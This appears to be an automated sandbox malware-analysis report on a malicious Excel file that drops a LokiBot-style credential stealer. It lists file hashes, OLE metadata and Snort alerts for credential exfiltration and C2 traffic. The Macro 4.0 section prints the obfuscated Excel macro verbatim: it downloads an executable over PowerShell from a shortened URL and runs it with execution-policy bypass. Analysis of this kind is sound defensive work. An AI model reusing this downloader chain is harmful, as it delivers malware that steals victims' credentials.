                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\Desktop\B5DE0000
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                        Category:dropped
                                                                                        Size (bytes):152144
                                                                                        Entropy (8bit):7.1465330226768335
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:o4k3hbdlylKsgqopeJBWhZFGkE+cL2Ndhi0olgaSN4PZlsuFPOLYiR6nJE0jjavY:Lk3hbdlylKsgqopeJBWhZFVE+W2NdhiZ
                                                                                        MD5:0873A1826881700041830C5B6254A989
                                                                                        SHA1:1B3A26F038342930CF0E86AC6809DE68DCBD057F
                                                                                        SHA-256:4DB366DD1391F89E6B9628CCD197D22B3C943B41B427E6830D13F8F9508FED25
                                                                                        SHA-512:D3FAF4AD765F429398B8FAC893ED79EB4F973C3C796BA658453D54200E5495170FF50D50FD67C30991F42E2E2A996318BFA961C5469C6836ACB7B5D534F306E9
                                                                                        Malicious:false
                                                                                        Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a
                                                                                        C:\Users\user\Documents\12.exe
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):938440
                                                                                        Entropy (8bit):5.522147302514215
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV
                                                                                        MD5:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        SHA1:CB2A4711C5F192EDBDE50229D976FCC95A5A314C
                                                                                        SHA-256:DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191
                                                                                        SHA-512:FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...lt...............................L... ........@.. ....................................`.................................dL..W....`...............:............................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............8..............@..B.................L......H........'..h$......B...P................................................ .........%.....(......... 4........%.....(.........*...0..........(....t....(....t......................................-.(....t....(....t............+5.....................&.............................-.....(....t....&.1..(....t............(....t....&.......................(....t....................-.........................(....t..........(....t....&. &.(....t....&..&(....t....&.........(....t....&..
                                                                                        C:\Users\user\ntrwe.exe
                                                                                        Process:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):938440
                                                                                        Entropy (8bit):5.522147302514215
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV
                                                                                        MD5:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        SHA1:CB2A4711C5F192EDBDE50229D976FCC95A5A314C
                                                                                        SHA-256:DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191
                                                                                        SHA-512:FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...lt...............................L... ........@.. ....................................`.................................dL..W....`...............:............................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............8..............@..B.................L......H........'..h$......B...P................................................ .........%.....(......... 4........%.....(.........*...0..........(....t....(....t......................................-.(....t....(....t............+5.....................&.............................-.....(....t....&.1..(....t............(....t....&.......................(....t....................-.........................(....t..........(....t....&. &.(....t....&..&(....t....&.........(....t....&..

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Last Saved By: Dell, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Tue Jan 5 14:27:14 2021, Security: 0
                                                                                        Entropy (8bit):7.166667516407053
                                                                                        TrID:
                                                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                        File name:6Cprm97UTl.xls
                                                                                        File size:127488
                                                                                        MD5:29c8b5edc30eadf757b72b0a14857903
                                                                                        SHA1:77d432fb96a0a453bae30107990c2c9ee0314330
                                                                                        SHA256:a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0
                                                                                        SHA512:f3e796ac54c7f64a01aca3ea2ae9c886e11ffdbc103024f34a19fdf4c07a58756375a9b60c4635cfb0790b82339147bf975303cd5f1f1fcbe8e2650d2c85f408
                                                                                        SSDEEP:3072:U4k3hbdlylKsgqopeJBWhZFGkE+cL2Nd+ioo1gaSNAPZlsWFPO7YiR6PJEcjjaPY:Xk3hbdlylKsgqopeJBWhZFVE+W2Nd+id
                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                        File Icon

                                                                                        Icon Hash:e4eea286a4b4bcb4

                                                                                        Static OLE Info

                                                                                        General

                                                                                        Document Type:OLE
                                                                                        Number of OLE Files:1

                                                                                        OLE File "6Cprm97UTl.xls"

                                                                                        Indicators

                                                                                        Has Summary Info:True
                                                                                        Application Name:unknown
                                                                                        Encrypted Document:False
                                                                                        Contains Word Document Stream:False
                                                                                        Contains Workbook/Book Stream:True
                                                                                        Contains PowerPoint Document Stream:False
                                                                                        Contains Visio Document Stream:False
                                                                                        Contains ObjectPool Stream:
                                                                                        Flash Objects Count:
                                                                                        Contains VBA Macros:True

                                                                                        Summary

                                                                                        Code Page:1252
                                                                                        Last Saved By:Dell
                                                                                        Create Time:2020-09-20 21:17:44
                                                                                        Last Saved Time:2021-01-05 14:27:14
                                                                                        Security:0

                                                                                        Document Summary

                                                                                        Document Code Page:1252
                                                                                        Thumbnail Scaling Desired:False
                                                                                        Contains Dirty Links:False
                                                                                        Shared Document:False
                                                                                        Changed Hyperlinks:False
                                                                                        Application Version:983040

                                                                                        Streams

                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                        General
                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                        File Type:data
                                                                                        Stream Size:4096
                                                                                        Entropy:0.232115956307
                                                                                        Base64 Encoded:False
                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8b 00 00 00 02 00 00 00 e4 04 00 00
                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                        General
                                                                                        Stream Path:\x5SummaryInformation
                                                                                        File Type:data
                                                                                        Stream Size:4096
                                                                                        Entropy:0.190042678721
                                                                                        Base64 Encoded:False
                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . h . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . . . . . . . . . . . . . D e l l . . . . @ . . . . L . z . . . . @ . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 48 00 00 00 0d 00 00 00 54 00 00 00 13 00 00 00 60 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00 40 00 00 00 00 4c f7 7a
                                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 116784
                                                                                        General
                                                                                        Stream Path:Workbook
                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                        Stream Size:116784
                                                                                        Entropy:7.53092053212
                                                                                        Base64 Encoded:True
                                                                                        Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                                                        Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                        Macro 4.0 Code

                                                                                        =ERROR(FALSE),,,,,,,,,"=GET.CELL(5,M583)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Do""&CHAR(119)&""n'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/qjdJoz4','12""&CHAR(46)&""exe')"")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item """"12""&CHAR(46)&""exe"""" -Destination """"${enV`:temp}"""""")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12""&CHAR(46)&""exe')"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        01/05/21-19:05:22.500040TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4916780192.168.2.2283.172.144.37
                                                                                        01/05/21-19:06:07.649980TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:07.649980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:07.649980TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:07.649980TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.645122TCP2025483ET TROJAN LokiBot Fake 404 Response8049170185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:08.887025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.887025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.887025TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.887025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.065680TCP2025483ET TROJAN LokiBot Fake 404 Response8049171185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:09.279376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.279376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.279376TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.279376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.462394TCP2025483ET TROJAN LokiBot Fake 404 Response8049172185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:09.669670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.669670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.669670TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.669670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.843837TCP2025483ET TROJAN LokiBot Fake 404 Response8049173185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:10.067266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.067266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.067266TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.067266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.236854TCP2025483ET TROJAN LokiBot Fake 404 Response8049174185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:10.499611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.499611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.499611TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.499611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.673143TCP2025483ET TROJAN LokiBot Fake 404 Response8049175185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:10.888136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.888136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.888136TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.888136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.065621TCP2025483ET TROJAN LokiBot Fake 404 Response8049176185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:11.296993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.296993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.296993TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.296993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.461579TCP2025483ET TROJAN LokiBot Fake 404 Response8049177185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:11.686950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.686950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.686950TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.686950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.871413TCP2025483ET TROJAN LokiBot Fake 404 Response8049178185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:12.075634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.075634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.075634TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.075634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.243051TCP2025483ET TROJAN LokiBot Fake 404 Response8049179185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:12.449877TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.449877TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.449877TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.449877TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.609106TCP2025483ET TROJAN LokiBot Fake 404 Response8049180185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:12.832799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.832799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.832799TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.832799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.22185.206.215.56
